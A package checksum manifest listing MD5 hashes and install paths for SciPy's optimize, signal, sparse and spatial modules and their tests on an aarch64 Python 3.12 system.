f676694b3e0faa1e9929b171df31cc7c  usr/lib/python3/dist-packages/scipy/optimize/moduleTNC.py
7556efa1f1de9e082f7a14dac2a6e193  usr/lib/python3/dist-packages/scipy/optimize/nonlin.py
7f64338d4e74e5bea0a06b196e65c68d  usr/lib/python3/dist-packages/scipy/optimize/optimize.py
e3ce00113f11bbc1dfdfc0be0e8b6013  usr/lib/python3/dist-packages/scipy/optimize/slsqp.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/optimize/tests/__init__.py
59d08489c1efa348617dfb994275937e  usr/lib/python3/dist-packages/scipy/optimize/tests/test__basinhopping.py
77129cf2d7c3883efb45f9216936a285  usr/lib/python3/dist-packages/scipy/optimize/tests/test__differential_evolution.py
fa90ee32c10abf89183aa4eb9f93b964  usr/lib/python3/dist-packages/scipy/optimize/tests/test__dual_annealing.py
a0c20eb8ea30f6e735809dae0af63c15  usr/lib/python3/dist-packages/scipy/optimize/tests/test__linprog_clean_inputs.py
8e2f2e6f7df200b06eb79f71a36e254e  usr/lib/python3/dist-packages/scipy/optimize/tests/test__numdiff.py
81b6991f4a08588a0ac2740709d709df  usr/lib/python3/dist-packages/scipy/optimize/tests/test__remove_redundancy.py
4b4b9053684fceeac6db8f9835965ee5  usr/lib/python3/dist-packages/scipy/optimize/tests/test__root.py
1ad6cd1ae87b0ac2d4b5e08f48794a3e  usr/lib/python3/dist-packages/scipy/optimize/tests/test__shgo.py
e5d2ebdb175e5cdbb22320ec3eef9550  usr/lib/python3/dist-packages/scipy/optimize/tests/test__spectral.py
4cc511b2510d8cae4182966a14bc62d9  usr/lib/python3/dist-packages/scipy/optimize/tests/test_cobyla.py
cfcbd00e45641abbe1ac67f0002360a8  usr/lib/python3/dist-packages/scipy/optimize/tests/test_constraint_conversion.py
73989ae51bb821902e8c0a01c8e205a7  usr/lib/python3/dist-packages/scipy/optimize/tests/test_constraints.py
0328fd7a52396587dffdd5e669e7b5fd  usr/lib/python3/dist-packages/scipy/optimize/tests/test_cython_optimize.py
89d47e2484c29228947366e17b46b252  usr/lib/python3/dist-packages/scipy/optimize/tests/test_differentiable_functions.py
9db3da22fcbbeaab7ab643401dfdb1f4  usr/lib/python3/dist-packages/scipy/optimize/tests/test_direct.py
29c42beaef79ddd4ceedf4129c86c865  usr/lib/python3/dist-packages/scipy/optimize/tests/test_hessian_update_strategy.py
5637f82afe99a0c189a11cd0ca259037  usr/lib/python3/dist-packages/scipy/optimize/tests/test_lbfgsb_hessinv.py
467513b378a2cab4cde3591c12756140  usr/lib/python3/dist-packages/scipy/optimize/tests/test_lbfgsb_setulb.py
80b5e95961210cf78615528562e03772  usr/lib/python3/dist-packages/scipy/optimize/tests/test_least_squares.py
f6c79eae78e49066c34b0421c60eb149  usr/lib/python3/dist-packages/scipy/optimize/tests/test_linear_assignment.py
ab89fe01d3279fbfa9cc504b007b9df6  usr/lib/python3/dist-packages/scipy/optimize/tests/test_linesearch.py
c994999b76480393f23d41d8ae1fd959  usr/lib/python3/dist-packages/scipy/optimize/tests/test_linprog.py
8f48156a3004a3f622e74d4b12c1ba4b  usr/lib/python3/dist-packages/scipy/optimize/tests/test_lsq_common.py
01fd74e037208caaba23fba2c2634e32  usr/lib/python3/dist-packages/scipy/optimize/tests/test_lsq_linear.py
e776ef46b99a3c539289b87db263bd7e  usr/lib/python3/dist-packages/scipy/optimize/tests/test_milp.py
4bb4ea450cb3b2e359d586b7bcbc4827  usr/lib/python3/dist-packages/scipy/optimize/tests/test_minimize_constrained.py
c2e4a01cf9901e38dceee6f0a8a00ec2  usr/lib/python3/dist-packages/scipy/optimize/tests/test_minpack.py
419f62d53c1b9032a66c4ddb3f24d38a  usr/lib/python3/dist-packages/scipy/optimize/tests/test_nnls.py
acbb54cbbb5c49e1de9177b35105384c  usr/lib/python3/dist-packages/scipy/optimize/tests/test_nonlin.py
7e1f040470acd74bad83e2906b657286  usr/lib/python3/dist-packages/scipy/optimize/tests/test_optimize.py
45cbef1459c4f4f299324a32ff1ba0f0  usr/lib/python3/dist-packages/scipy/optimize/tests/test_quadratic_assignment.py
c4f4f56f2ad74e313941d555a0d780bf  usr/lib/python3/dist-packages/scipy/optimize/tests/test_regression.py
0cd21876e27f4b07e24a008fac18ec25  usr/lib/python3/dist-packages/scipy/optimize/tests/test_slsqp.py
9b293e99b4e8bfd86184c8f98d94b1c0  usr/lib/python3/dist-packages/scipy/optimize/tests/test_tnc.py
3f5214500f6d9a656130f4cbdf9ee9b3  usr/lib/python3/dist-packages/scipy/optimize/tests/test_trustregion.py
a534f99d1faae2ee01fc9287ebc2b0c4  usr/lib/python3/dist-packages/scipy/optimize/tests/test_trustregion_exact.py
14df8fdb3ba7a8f6e582401a53a96c67  usr/lib/python3/dist-packages/scipy/optimize/tests/test_trustregion_krylov.py
62bb8b30260208608197523ae92f5280  usr/lib/python3/dist-packages/scipy/optimize/tests/test_zeros.py
5ebaccb6244d4d985632bb01b28c315f  usr/lib/python3/dist-packages/scipy/optimize/tnc.py
262ecc59ae6bda511b1092193040a842  usr/lib/python3/dist-packages/scipy/optimize/zeros.py
a24b351c21c9ea876b946fb200533164  usr/lib/python3/dist-packages/scipy/signal/__init__.py
41bf11d82cbe72261d106b4fdb7aa60e  usr/lib/python3/dist-packages/scipy/signal/_arraytools.py
af35914b63b8c86fbe663d49c8c7b6e0  usr/lib/python3/dist-packages/scipy/signal/_bsplines.py
dcf6b47f7d79be425155325c89ad3d44  usr/lib/python3/dist-packages/scipy/signal/_czt.py
220f523b46504aa129874e4b516b0d61  usr/lib/python3/dist-packages/scipy/signal/_filter_design.py
74ca7dab8c906b9a9418dbaf0ae96e0a  usr/lib/python3/dist-packages/scipy/signal/_fir_filter_design.py
4db882940220688cf05712dc804406c8  usr/lib/python3/dist-packages/scipy/signal/_lti_conversion.py
4fd1249c66c0dd204d6bc837ac4fe1f4  usr/lib/python3/dist-packages/scipy/signal/_ltisys.py
ac0af97fdf41401f564f9f226554e220  usr/lib/python3/dist-packages/scipy/signal/_max_len_seq.py
92fe3384fa384e880661ead645c43ac2  usr/lib/python3/dist-packages/scipy/signal/_max_len_seq_inner.cpython-312-aarch64-linux-gnu.so
cdf62c53f516507fdefc9b98ad10d55b  usr/lib/python3/dist-packages/scipy/signal/_peak_finding.py
827ae5456512f1d49e16a8d4f9f8f098  usr/lib/python3/dist-packages/scipy/signal/_peak_finding_utils.cpython-312-aarch64-linux-gnu.so
9c1e7af225fa3e80eeb6d3b4e97da577  usr/lib/python3/dist-packages/scipy/signal/_savitzky_golay.py
3e1e9c67eed5af6d12566f593f2b0295  usr/lib/python3/dist-packages/scipy/signal/_signaltools.py
d46d6af1669dff772a685af4bbe13f99  usr/lib/python3/dist-packages/scipy/signal/_sigtools.cpython-312-aarch64-linux-gnu.so
801bcd1f793cfc60100acf9163386028  usr/lib/python3/dist-packages/scipy/signal/_sosfilt.cpython-312-aarch64-linux-gnu.so
d045473c73755c9d4cfb90abac07274e  usr/lib/python3/dist-packages/scipy/signal/_spectral.cpython-312-aarch64-linux-gnu.so
0121a05a82b65818b7b4738e466132c6  usr/lib/python3/dist-packages/scipy/signal/_spectral.py
d586a1bf67e53e68f6e07e5d7bd86d8f  usr/lib/python3/dist-packages/scipy/signal/_spectral_py.py
fdcead250b78f7c3b64bccb989d774b3  usr/lib/python3/dist-packages/scipy/signal/_spline.cpython-312-aarch64-linux-gnu.so
dbff006d74cb59d03978de8f5601f752  usr/lib/python3/dist-packages/scipy/signal/_upfirdn.py
55a04cba77d0815dc6cc1006a02a6d8f  usr/lib/python3/dist-packages/scipy/signal/_upfirdn_apply.cpython-312-aarch64-linux-gnu.so
aa08f38e03d135e42d5b1a75ed28be4c  usr/lib/python3/dist-packages/scipy/signal/_waveforms.py
9cbf2dde9aea9a8d1215e9950f88697b  usr/lib/python3/dist-packages/scipy/signal/_wavelets.py
ac1cd4a28af708310efa49d2867a53a0  usr/lib/python3/dist-packages/scipy/signal/bsplines.py
2311f669045392ac05dc25f95f3809d1  usr/lib/python3/dist-packages/scipy/signal/filter_design.py
5209de2843b62cbe42fb4f6db1b74f28  usr/lib/python3/dist-packages/scipy/signal/fir_filter_design.py
bdfe97b1432ba294a525e9a552d2c547  usr/lib/python3/dist-packages/scipy/signal/lti_conversion.py
a5b63822640b6ecaa33f12ab2f403350  usr/lib/python3/dist-packages/scipy/signal/ltisys.py
50ee0600c5ca99eb381e71aa5872fdcc  usr/lib/python3/dist-packages/scipy/signal/signaltools.py
ee02342c01baa10faad65e42a5e33d0c  usr/lib/python3/dist-packages/scipy/signal/spectral.py
522473747af0c8e8b1672b7a5d66e574  usr/lib/python3/dist-packages/scipy/signal/spline.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/signal/tests/__init__.py
084f0d411a03867919052e47b53cf255  usr/lib/python3/dist-packages/scipy/signal/tests/mpsig.py
6e0b86c20f919e1b9349b44a60f58e37  usr/lib/python3/dist-packages/scipy/signal/tests/test_array_tools.py
084035e2a885a1c6d4b29d7ec2f7ac0d  usr/lib/python3/dist-packages/scipy/signal/tests/test_bsplines.py
9167b89e46b34479470bc8e14643a3cf  usr/lib/python3/dist-packages/scipy/signal/tests/test_cont2discrete.py
4c4f04712988b688b2eb68ea46f839bb  usr/lib/python3/dist-packages/scipy/signal/tests/test_czt.py
a89c994b5030f4e04dff9bad9bdf53da  usr/lib/python3/dist-packages/scipy/signal/tests/test_dltisys.py
e4a66ed33386ded6f2c6676e4006d7f8  usr/lib/python3/dist-packages/scipy/signal/tests/test_filter_design.py
ebc74064926ed75ab61e807d3ee85171  usr/lib/python3/dist-packages/scipy/signal/tests/test_fir_filter_design.py
6812d874662010fbc35e5bfd65eed726  usr/lib/python3/dist-packages/scipy/signal/tests/test_ltisys.py
c6b01852962c4dcab5fba78dd2ce7a3b  usr/lib/python3/dist-packages/scipy/signal/tests/test_max_len_seq.py
8965f6ecd17f85f492bee59384022240  usr/lib/python3/dist-packages/scipy/signal/tests/test_peak_finding.py
28db32e613cc7c2450c2afff7fedcd77  usr/lib/python3/dist-packages/scipy/signal/tests/test_result_type.py
a0de8e57b70b450ed30c97cbda6a082c  usr/lib/python3/dist-packages/scipy/signal/tests/test_savitzky_golay.py
b48decf50cd81fe7f424a6f353b27ff9  usr/lib/python3/dist-packages/scipy/signal/tests/test_signaltools.py
ddd4b725a1b016e73e167078100a6a8c  usr/lib/python3/dist-packages/scipy/signal/tests/test_spectral.py
b1438dc69462bc954f2e9cd56f3b94cf  usr/lib/python3/dist-packages/scipy/signal/tests/test_upfirdn.py
d7dbfffeaeec7a8f5b5056b4ba6697c5  usr/lib/python3/dist-packages/scipy/signal/tests/test_waveforms.py
06e2e78567a94f69f1f544f03d609e73  usr/lib/python3/dist-packages/scipy/signal/tests/test_wavelets.py
826b1630d277ba16fe917c08aa5eacb8  usr/lib/python3/dist-packages/scipy/signal/tests/test_windows.py
51034d6fb30587a829fdda7f35e81063  usr/lib/python3/dist-packages/scipy/signal/waveforms.py
e42a3788c22e7419ff7ec573b9c6198a  usr/lib/python3/dist-packages/scipy/signal/wavelets.py
5e677ce66b435993a48a1737ba4ba2c8  usr/lib/python3/dist-packages/scipy/signal/windows/__init__.py
a2a2cfa473409804c17d9437ca1f45a6  usr/lib/python3/dist-packages/scipy/signal/windows/_windows.py
dae807f2f5b714d4b4c4cea95eea75f2  usr/lib/python3/dist-packages/scipy/signal/windows/windows.py
9d6235e51a40e92e0aec884aa019c5bf  usr/lib/python3/dist-packages/scipy/sparse/__init__.py
a901318110e08de97ba2f3530d5fdfd4  usr/lib/python3/dist-packages/scipy/sparse/_base.py
4f2186f49308e93497fce9450514b57c  usr/lib/python3/dist-packages/scipy/sparse/_bsr.py
a4fd3dee53e283ece2d09e1de517c2f9  usr/lib/python3/dist-packages/scipy/sparse/_compressed.py
e502e485697ff86dc653f0c65703388d  usr/lib/python3/dist-packages/scipy/sparse/_construct.py
a6d88bc287308f86e2061aefc4632a67  usr/lib/python3/dist-packages/scipy/sparse/_coo.py
a6be3ca0a7b1aa2a4a323c68fbd4a4b6  usr/lib/python3/dist-packages/scipy/sparse/_csc.py
4fbb78d4a235cff288be7768e2c75a18  usr/lib/python3/dist-packages/scipy/sparse/_csparsetools.cpython-312-aarch64-linux-gnu.so
03788f1dcb65e09ae4057acd3c6399ba  usr/lib/python3/dist-packages/scipy/sparse/_csr.py
a31941e5061da9607866279f294c43aa  usr/lib/python3/dist-packages/scipy/sparse/_data.py
01c7b437e425816983df4206d36c292e  usr/lib/python3/dist-packages/scipy/sparse/_dia.py
1edc62f7f94a764a5eb322f6487f5b0b  usr/lib/python3/dist-packages/scipy/sparse/_dok.py
086b6bb4ae284acad8a53787ef7be126  usr/lib/python3/dist-packages/scipy/sparse/_extract.py
fbf8ed998fdc9415ecf6c0a1b3bc8b13  usr/lib/python3/dist-packages/scipy/sparse/_index.py
55923367eb31af88d8293e435ab6a775  usr/lib/python3/dist-packages/scipy/sparse/_lil.py
368088d313ca7f6ee095f883b3636cb0  usr/lib/python3/dist-packages/scipy/sparse/_matrix.py
046ca6434755a61d8d4b1ae658565490  usr/lib/python3/dist-packages/scipy/sparse/_matrix_io.py
7ff2e60fe39fa898eaad7727af9da8f9  usr/lib/python3/dist-packages/scipy/sparse/_sparsetools.cpython-312-aarch64-linux-gnu.so
69a0f9d5ad256b54f8a5bf70a2581895  usr/lib/python3/dist-packages/scipy/sparse/_spfuncs.py
5b481bc7a01f1eefb3accfb5284a930d  usr/lib/python3/dist-packages/scipy/sparse/_sputils.py
95a7a69fc19a3772c9eeed21e35da3b7  usr/lib/python3/dist-packages/scipy/sparse/base.py
d30ccbf8f5add10f927f28e8d3dc1b14  usr/lib/python3/dist-packages/scipy/sparse/bsr.py
56e6ec13501caed0ece150a694f9021f  usr/lib/python3/dist-packages/scipy/sparse/compressed.py
dd381e484d87ddff3126ab2bfa6855df  usr/lib/python3/dist-packages/scipy/sparse/construct.py
890988792fb9aa0bd569cc3bc210cd48  usr/lib/python3/dist-packages/scipy/sparse/coo.py
a98913f84d0a760b4113d6ccd5e691e5  usr/lib/python3/dist-packages/scipy/sparse/csc.py
00004e5b97ba7554da3eff63146ccb3a  usr/lib/python3/dist-packages/scipy/sparse/csgraph/__init__.py
dc01974f055ae419ff331d7a1850f66f  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_flow.cpython-312-aarch64-linux-gnu.so
5e2a16c82d65c269a3dd278555c8043c  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_laplacian.py
9e7e04c87aa0e8a2bb64d93f33bf25ed  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_matching.cpython-312-aarch64-linux-gnu.so
d8e8d139b4cf75c5fe60eb354a4f8dc4  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_min_spanning_tree.cpython-312-aarch64-linux-gnu.so
e71791e5f3ac804ac7a810333830c46b  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_reordering.cpython-312-aarch64-linux-gnu.so
5777840d45f21b7df1a4cd67a12b8ffa  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_shortest_path.cpython-312-aarch64-linux-gnu.so
6c5f7e4092a4926ce76ed07ae03f3dae  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_tools.cpython-312-aarch64-linux-gnu.so
970816e8df065730e157a67f2f8e7d7c  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_traversal.cpython-312-aarch64-linux-gnu.so
978b4eb21fdcdaebc7dd7efc11e66c5d  usr/lib/python3/dist-packages/scipy/sparse/csgraph/_validation.py
2e7559b22ecc31cd2c97a09116883185  usr/lib/python3/dist-packages/scipy/sparse/csgraph/setup.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/__init__.py
fd8ea68fc69919e8f9f6a18fb65a1e55  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_connected_components.py
3df99e2356bedfc8ba648120a8c0b7db  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_conversions.py
fe0d8ac27c82dcb7bd8ce8a2cb94ee8c  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_flow.py
aef93b652124061a3d0d6e1776a2f368  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_graph_laplacian.py
97c3d9041e5d8724550d560885db19cf  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_matching.py
aafc72408945d574cd773f3490602574  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_reordering.py
aa706fa22cdbc54530d4d1b9ed2be513  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_shortest_path.py
788223b0bcdd0de9c4e09fca6d7a4e03  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_spanning_tree.py
3382fccf4b05029eb04dded2c2c47dc5  usr/lib/python3/dist-packages/scipy/sparse/csgraph/tests/test_traversal.py
d3321cbc7bfa1b3367be1d8193bd5030  usr/lib/python3/dist-packages/scipy/sparse/csr.py
0bbf719f5930b064fa5704e1df10592c  usr/lib/python3/dist-packages/scipy/sparse/data.py
5bce1f6d17ea9de06d40dc509a695036  usr/lib/python3/dist-packages/scipy/sparse/dia.py
09f1f131054248a4ebcd38a704734e8c  usr/lib/python3/dist-packages/scipy/sparse/dok.py
e5d1851be542fd0360b27e6e9a513e51  usr/lib/python3/dist-packages/scipy/sparse/extract.py
ceabc5a1c05182226cb6a3a47df18e11  usr/lib/python3/dist-packages/scipy/sparse/lil.py
e9f36a7d35aa71ebdcea36476eb926c5  usr/lib/python3/dist-packages/scipy/sparse/linalg/__init__.py
e93fa2c3b05558e0816eaf9fdeb191a5  usr/lib/python3/dist-packages/scipy/sparse/linalg/_dsolve/__init__.py
5f4d3021a0fc8ace4463df6ad9647dd8  usr/lib/python3/dist-packages/scipy/sparse/linalg/_dsolve/_add_newdocs.py
25b35b2f28f13390d38c61589829b6d8  usr/lib/python3/dist-packages/scipy/sparse/linalg/_dsolve/_superlu.cpython-312-aarch64-linux-gnu.so
b051671570c1b085203a20e4fb12b581  usr/lib/python3/dist-packages/scipy/sparse/linalg/_dsolve/linsolve.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/sparse/linalg/_dsolve/tests/__init__.py
81078a2ac5c8f5d34eb3c0e6986507a5  usr/lib/python3/dist-packages/scipy/sparse/linalg/_dsolve/tests/test_linsolve.py
263115a37c480c92b0e242dbdf5e4b24  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/__init__.py
a4d3d59abb5917bbd16c50c0922bacca  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/_svds.py
279a0e021bd38a2b11838c0ce657adb1  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/_svds_doc.py
29e47344f98423df9aa3032994f313fc  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/arpack/COPYING
261e837126cdfd3d5d32f9fd5bd29524  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/arpack/__init__.py
cbce6c90a1c43ca14d40bc4d87edc3d3  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/arpack/_arpack.cpython-312-aarch64-linux-gnu.so
8e454990aebe5f71a89194ecdb8c5942  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/arpack/arpack.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/arpack/tests/__init__.py
3eb53d54cec9954a83152a8eae935070  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/arpack/tests/test_arpack.py
17c22a9f82645617fcd04434d53c3dc1  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/lobpcg/__init__.py
945f8cabb751cfddf7e60df8ceef4618  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/lobpcg/lobpcg.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/lobpcg/tests/__init__.py
0914a956315097f0f27ba2d36e3442b3  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/lobpcg/tests/test_lobpcg.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/tests/__init__.py
f4fa8faeb2c6366fa1dd88182c60dcec  usr/lib/python3/dist-packages/scipy/sparse/linalg/_eigen/tests/test_svds.py
e0372070b2aeebd1e5880f9a5e3bae24  usr/lib/python3/dist-packages/scipy/sparse/linalg/_expm_multiply.py
c45f83db2b712b6e5a6aa1d3193698f8  usr/lib/python3/dist-packages/scipy/sparse/linalg/_interface.py
ba09caa78439538a1a679ea2179374b1  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/__init__.py
6695a02002fa8b3fc5e2c45405b0587d  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/_gcrotmk.py
07f2ddaae459dd7c07e89daea62d6cec  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/_iterative.cpython-312-aarch64-linux-gnu.so
1643a4be2d5e436f1fde6c193011b831  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/iterative.py
a60702814345e708445a4f6e66e17807  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/lgmres.py
b3c4b941653fad0e8564a3efc44acf11  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/lsmr.py
0fa895f7da4a48a2eaaee0932385e12a  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/lsqr.py
54fe0ea9663eb8215945036ba27f5e00  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/minres.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tests/__init__.py
842cd6caf43146c8f77a1b972b5ec976  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tests/test_gcrotmk.py
c1df5a684c1c4bc97e4040e3358b16f6  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tests/test_iterative.py
8b09aca792dbbac032292c0b2e55bdce  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tests/test_lgmres.py
01d09039e349cee657d685554bad3bc5  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tests/test_lsmr.py
f4e522fa4ea8b6b71c37a4b847b887e6  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tests/test_lsqr.py
7ec2f976ca399e95bed44e848a4836ea  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tests/test_minres.py
d21ba6236f33392b9b6025bbdd7d1d8e  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tests/test_utils.py
bf5384e7e87823f1c68c414fc6271806  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/tfqmr.py
3f932627379aa7828ec2937193945f36  usr/lib/python3/dist-packages/scipy/sparse/linalg/_isolve/utils.py
9e6414ba1af998aa436f293ba2e3d58f  usr/lib/python3/dist-packages/scipy/sparse/linalg/_matfuncs.py
066e94bf0bf279ea0d9f0db348826e34  usr/lib/python3/dist-packages/scipy/sparse/linalg/_norm.py
dfa3f20869e03352febb610f93d53b61  usr/lib/python3/dist-packages/scipy/sparse/linalg/_onenormest.py
15e6d480dfe3fab0ec476e786b92d1d6  usr/lib/python3/dist-packages/scipy/sparse/linalg/_propack/_cpropack.cpython-312-aarch64-linux-gnu.so
b0fb4a26932c4d35ad6d52d8e41c8327  usr/lib/python3/dist-packages/scipy/sparse/linalg/_propack/_dpropack.cpython-312-aarch64-linux-gnu.so
cbd9d0e9689328ac7a9745d4751f0ad4  usr/lib/python3/dist-packages/scipy/sparse/linalg/_propack/_spropack.cpython-312-aarch64-linux-gnu.so
d3d906f24a873b55efa86fca8b98b7c4  usr/lib/python3/dist-packages/scipy/sparse/linalg/_propack/_zpropack.cpython-312-aarch64-linux-gnu.so
763617612fb79aad5a6286f499e6f27c  usr/lib/python3/dist-packages/scipy/sparse/linalg/_svdp.py
b15c98c2f6c50fc301d7d585d276472f  usr/lib/python3/dist-packages/scipy/sparse/linalg/dsolve.py
7425d6a086d2c122f89a1c8d780c6c85  usr/lib/python3/dist-packages/scipy/sparse/linalg/eigen.py
bbcd0603e2c71927a452666a25c5aa68  usr/lib/python3/dist-packages/scipy/sparse/linalg/interface.py
fa0477a11614d47d35986e28e6dc8fe5  usr/lib/python3/dist-packages/scipy/sparse/linalg/isolve.py
d90539b10bc4301207c3e36458638efb  usr/lib/python3/dist-packages/scipy/sparse/linalg/matfuncs.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/__init__.py
668952bdc55b9aa60e3bc6f1ee6d35d3  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/propack_test_data.npz
1c1e7eee0efa11a8edd719458aec20da  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/test_expm_multiply.py
8ee1a72fca59dfa3752f55bb2ed5b15f  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/test_interface.py
338a9c146368eaf31bce868e18a5bdde  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/test_matfuncs.py
015a5a6fbc86a84246c005a20bf2b1f1  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/test_norm.py
1650637b53ade353a65fb887ff178e9d  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/test_onenormest.py
befdc52282ac0f3d79ed262a5fee10a3  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/test_propack.py
ea93918d0f47960ffd045f4dea8d337f  usr/lib/python3/dist-packages/scipy/sparse/linalg/tests/test_pydata_sparse.py
74a2883376bc5118b5e5b68cad448a46  usr/lib/python3/dist-packages/scipy/sparse/sparsetools.py
b1e0f9c305bfc3eb64d0ae2daf0fb7a1  usr/lib/python3/dist-packages/scipy/sparse/spfuncs.py
d834bc111abbad6e615251120aa8a152  usr/lib/python3/dist-packages/scipy/sparse/sputils.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/sparse/tests/__init__.py
4c52e10d803ee50c2e04c9e260628968  usr/lib/python3/dist-packages/scipy/sparse/tests/data/csc_py2.npz
a3b2566b2b5eb5cae2d9e51628d2c826  usr/lib/python3/dist-packages/scipy/sparse/tests/data/csc_py3.npz
e0a545b1e561e0f0026fbb4683c2aecb  usr/lib/python3/dist-packages/scipy/sparse/tests/test_array_api.py
58b83172967ad61a94c6b6445c5ec0c3  usr/lib/python3/dist-packages/scipy/sparse/tests/test_base.py
961ddc651effe74fb09613b7d16eaec3  usr/lib/python3/dist-packages/scipy/sparse/tests/test_construct.py
8ab4d48564292d24b293f8ca55e74b1b  usr/lib/python3/dist-packages/scipy/sparse/tests/test_csc.py
5a620fc9d3bf411a976eb23f1d2bdf4d  usr/lib/python3/dist-packages/scipy/sparse/tests/test_csr.py
87ae620c018325b1a391312e72775efc  usr/lib/python3/dist-packages/scipy/sparse/tests/test_deprecations.py
6cf234dd5f0fd8d569becd20fd4966ce  usr/lib/python3/dist-packages/scipy/sparse/tests/test_extract.py
8223b98ac6790dfde38a132537ffdeeb  usr/lib/python3/dist-packages/scipy/sparse/tests/test_matrix_io.py
1215423eaa383683b9143944ed40d924  usr/lib/python3/dist-packages/scipy/sparse/tests/test_sparsetools.py
86cd72019b4570781ec394807e78f4ca  usr/lib/python3/dist-packages/scipy/sparse/tests/test_spfuncs.py
e5d9d5d022fe3938fee69fd80eb238b6  usr/lib/python3/dist-packages/scipy/sparse/tests/test_sputils.py
6ae54097720f1d122a4a2a5cadc2e022  usr/lib/python3/dist-packages/scipy/spatial/__init__.py
189f6cbdc8369bc7b84746ae1db133f0  usr/lib/python3/dist-packages/scipy/spatial/_ckdtree.cpython-312-aarch64-linux-gnu.so
bc7d00e4b7518894d59d9dbc83f2943b  usr/lib/python3/dist-packages/scipy/spatial/_ckdtree.pyi
70c6bd406f7e030513b0bde81a6fe292  usr/lib/python3/dist-packages/scipy/spatial/_distance_pybind.cpython-312-aarch64-linux-gnu.so
cafcfbb1862cf0f3a717e1af960771a5  usr/lib/python3/dist-packages/scipy/spatial/_distance_wrap.cpython-312-aarch64-linux-gnu.so
892c12f6fb79b45a99ba6877860cf7f6  usr/lib/python3/dist-packages/scipy/spatial/_geometric_slerp.py
75730587e379138ea54a08872fcd225b  usr/lib/python3/dist-packages/scipy/spatial/_hausdorff.cpython-312-aarch64-linux-gnu.so
cf11bb2965ffb8ff06fe6b6350aecb10  usr/lib/python3/dist-packages/scipy/spatial/_kdtree.py
95106b41f5e1dcffa5775b229febbea9  usr/lib/python3/dist-packages/scipy/spatial/_plotutils.py
7e3b9b45ec4f2793f0ee8c1d9f3f2d25  usr/lib/python3/dist-packages/scipy/spatial/_procrustes.py
da4c785fd9edbace79da8b0be1b04737  usr/lib/python3/dist-packages/scipy/spatial/_qhull.cpython-312-aarch64-linux-gnu.so
3a5abdf03f47f8185c761cfc24291283  usr/lib/python3/dist-packages/scipy/spatial/_qhull.pyi
abcc7776d991a14f188a306d010a03b9  usr/lib/python3/dist-packages/scipy/spatial/_spherical_voronoi.py
15d58be79ddf575364268fa042986401  usr/lib/python3/dist-packages/scipy/spatial/_voronoi.cpython-312-aarch64-linux-gnu.so
5c91a076f6f33ea454fdd9229e2878c4  usr/lib/python3/dist-packages/scipy/spatial/_voronoi.pyi
f55f7dfd4f6593eb540123ffd55c70f6  usr/lib/python3/dist-packages/scipy/spatial/ckdtree.py
87c9e1033662108f8161a4c6333980e4  usr/lib/python3/dist-packages/scipy/spatial/distance.py
56527b709cea37731c0bc777b6d9aeb7  usr/lib/python3/dist-packages/scipy/spatial/distance.pyi
